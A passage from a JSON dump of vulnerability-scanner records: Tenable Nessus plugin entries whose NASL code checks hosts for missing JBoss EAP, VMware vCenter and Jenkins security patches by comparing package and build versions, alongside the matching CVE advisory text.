if (rpm_check(release:\"RHEL7\", reference:\"httpserver-1.0.8-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-common-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-common-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-common-spi-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-core-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-core-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-deployers-common-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-jdbc-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-spec-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-validator-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-appclient-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-cli-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-client-all-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-clustering-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-cmp-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-configadmin-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-connector-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-controller-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-controller-client-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-core-security-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-deployment-repository-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-deployment-scanner-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-domain-http-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-domain-management-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-ee-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-ee-deployment-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-ejb3-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-embedded-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-host-controller-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jacorb-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jaxr-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jaxrs-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jdr-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jmx-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jpa-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jsf-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jsr77-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-logging-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-mail-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-management-client-content-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-messaging-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-modcluster-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-naming-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-network-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-osgi-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-osgi-configadmin-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-osgi-service-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-picketlink-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-platform-mbean-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-pojo-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-process-controller-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-protocol-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-remoting-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-sar-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-security-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-server-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-system-jmx-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-threads-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-transactions-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-version-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-web-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-webservices-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-weld-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-xts-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-ejb-client-1.0.39-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-security-negotiation-2.3.13-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-xnio-base-3.0.16-1.GA_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-appclient-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-bundles-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-core-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-domain-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-javadocs-7.5.15-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-modules-eap-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-product-eap-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-standalone-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-welcome-content-eap-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossweb-7.5.22-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"picketbox-4.1.5-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"picketlink-bindings-2.5.4-14.SP12_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"picketlink-federation-2.5.4-14.SP12_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"resteasy-2.3.19-1.Final_redhat_1.1.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"hibernate4-core-eap6 / hibernate4-eap6 / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:27", "description": "An update for jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2).\n\nWith this update, the jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 6.4.15.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "nessus", "title": "RHEL 6 : jboss-ec2-eap (RHSA-2017:1260)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9606"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jboss-ec2-eap", "p-cpe:/a:redhat:enterprise_linux:jboss-ec2-eap-samples", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2017-1260.NASL", "href": "https://www.tenable.com/plugins/nessus/100288", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1260. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100288);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-9606\");\n script_xref(name:\"RHSA\", value:\"2017:1260\");\n\n script_name(english:\"RHEL 6 : jboss-ec2-eap (RHSA-2017:1260)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for jboss-ec2-eap is now available for Red Hat JBoss\nEnterprise Application Platform 6.4 for RHEL 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe jboss-ec2-eap packages provide scripts for Red Hat JBoss\nEnterprise Application Platform running on the Amazon Web Services\n(AWS) Elastic Compute Cloud (EC2).\n\nWith this update, the jboss-ec2-eap package has been updated to ensure\ncompatibility with Red Hat JBoss Enterprise Application Platform\n6.4.15.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be\nforced to parse a request with YamlProvider, resulting in\nunmarshalling of potentially untrusted data. An attacker could\npossibly use this flaw execute arbitrary code with the permissions of\nthe application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for\nreporting these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-US/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9606\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected jboss-ec2-eap and / or jboss-ec2-eap-samples\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ec2-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ec2-eap-samples\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1260\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ec2-eap-7.5.15-3.Final_redhat_3.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ec2-eap-samples-7.5.15-3.Final_redhat_3.ep6.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jboss-ec2-eap / jboss-ec2-eap-samples\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-11T14:26:13", "description": "The version of VMware vCenter Server installed on the remote host is 6.0.x prior to 6.0u3b or 6.5.x prior to 6.5c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.0.x < 6.0u3b / 6.5.x < 6.5c BlazeDS AMF3 RCE (VMSA-2017-0007)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5641"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2017-0007.NASL", "href": "https://www.tenable.com/plugins/nessus/99475", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99475);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2017-5641\");\n script_bugtraq_id(97383);\n script_xref(name:\"VMSA\", value:\"2017-0007\");\n script_xref(name:\"CERT\", value:\"307983\");\n\n script_name(english:\"VMware vCenter Server 6.0.x < 6.0u3b / 6.5.x < 6.5c BlazeDS AMF3 RCE (VMSA-2017-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host\nis affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is\n6.0.x prior to 6.0u3b or 6.5.x prior to 6.5c. It is, therefore,\naffected by a flaw in FlexBlazeDS when processing AMF3 messages due to\nallowing the instantiation of arbitrary classes when deserializing\nobjects. An unauthenticated, remote attacker can exploit this, by\nsending a specially crafted Java object, to execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2017-0007.html\");\n # https://docs.vmware.com/en/VMware-vSphere/6.0/rn/vsphere-vcenter-server-60u3b-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1bb48b81\");\n # https://docs.vmware.com/en/VMware-vSphere/6.5/rn/vsphere-vcenter-server-650c-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f0a01429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://codewhitesec.blogspot.com/2017/04/amf.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server version 6.0u3b (6.0.0 build-5326177)\n/ 6.0u3b on Windows (6.0.0 build-5318198) / 6.5.0c (6.5.0\nbuild-5318112) or later. Alternatively, apply the vendor-supplied\nworkaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service.nasl\", \"os_fingerprint.nasl\", \"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_kb_item_or_exit(\"Host/VMware/vCenter\");\nversion = get_kb_item_or_exit(\"Host/VMware/version\");\nrelease = get_kb_item_or_exit(\"Host/VMware/release\");\n\n# Extract and verify the build number\nbuild = ereg_replace(\n pattern:'^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$',\n string:release, replace:\"\\1\"\n);\n\nif (empty_or_null(build) || build !~ '^[0-9]+$')\n audit(AUDIT_UNKNOWN_BUILD, \"VMware vCenter Server\");\n\nbuild = int(build);\nrelease = release - 'VMware vCenter Server ';\nfixversion = NULL;\nos = get_kb_item(\"Host/OS\");\n\n# Check version and build numbers\nif (version =~ \"^VMware vCenter 6\\.0($|[^0-9])\")\n{\n # If not paranoid, let's check to see if OS is populated\n if (report_paranoia < 2 && empty_or_null(os))\n exit(0, \"Can not determine version 6.0 fix build because Host/OS KB item is not set.\");\n\n # vCenter Server 6.0 Update 3b on Windows | 13 APR 2017 | ISO Build 5318198\n # Windows\n if (\"windows\" >< tolower(os))\n {\n fixbuild = 5318198;\n if (build < fixbuild) fixversion = '6.0.0 build-'+fixbuild;\n }\n\n # vCenter Server 6.0 Update 3b on vCenter Server Appliance Build 5318203\n # Standard\n else\n {\n fixbuild = 5318203;\n if (build < fixbuild) fixversion = '6.0.0 build-'+fixbuild;\n }\n}\nelse if (version =~ \"^VMware vCenter 6\\.5($|[^0-9])\")\n{\n # vCenter Server 6.5.0c | 13 APRIL 2017 | ISO Build 5318112\n # Standard\n fixbuild = 5318112;\n if (build < fixbuild) fixversion = '6.5.0 build-'+fixbuild;\n}\n\nif (isnull(fixversion))\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = report_items_str(\n report_items:make_array(\n \"Installed version\", release,\n \"Fixed version\", fixversion\n ),\n ordered_fields:make_list(\"Installed version\", \"Fixed version\")\n);\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:32", "description": "The remote web server hosts a version of Jenkins or Jenkins Enterprise that is prior to 1.638 or 1.625.2. It is, therefore, affected by a flaw in the Apache Commons Collections (ACC) library that allows the deserialization of unauthenticated Java objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code on the target host.", "cvss3": {}, "published": "2015-11-17T00:00:00", "type": "nessus", "title": "Jenkins < 1.638 / 1.625.2 Java Object Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8103"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cloudbees:jenkins"], "id": "JENKINS_SECURITY218.NASL", "href": "https://www.tenable.com/plugins/nessus/86898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86898);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-8103\");\n script_bugtraq_id(77636);\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Jenkins < 1.638 / 1.625.2 Java Object Deserialization RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server hosts a version of Jenkins or Jenkins Enterprise\nthat is prior to 1.638 or 1.625.2. It is, therefore, affected by a\nflaw in the Apache Commons Collections (ACC) library that allows the\ndeserialization of unauthenticated Java objects. An unauthenticated,\nremote attacker can exploit this to execute arbitrary code on the\ntarget host.\");\n # https://jenkins-ci.org/content/mitigating-unauthenticated-remote-code-execution-0-day-jenkins-cli\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0316bc02\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/jenkinsci-cert/SECURITY-218\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.apache.org/jira/browse/COLLECTIONS-580\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Jenkins version 1.638 / 1.625.2 or later. Alternatively,\ndisable the CLI port per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8103\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenNMS Java Object Unserialization Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cloudbees:jenkins\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate 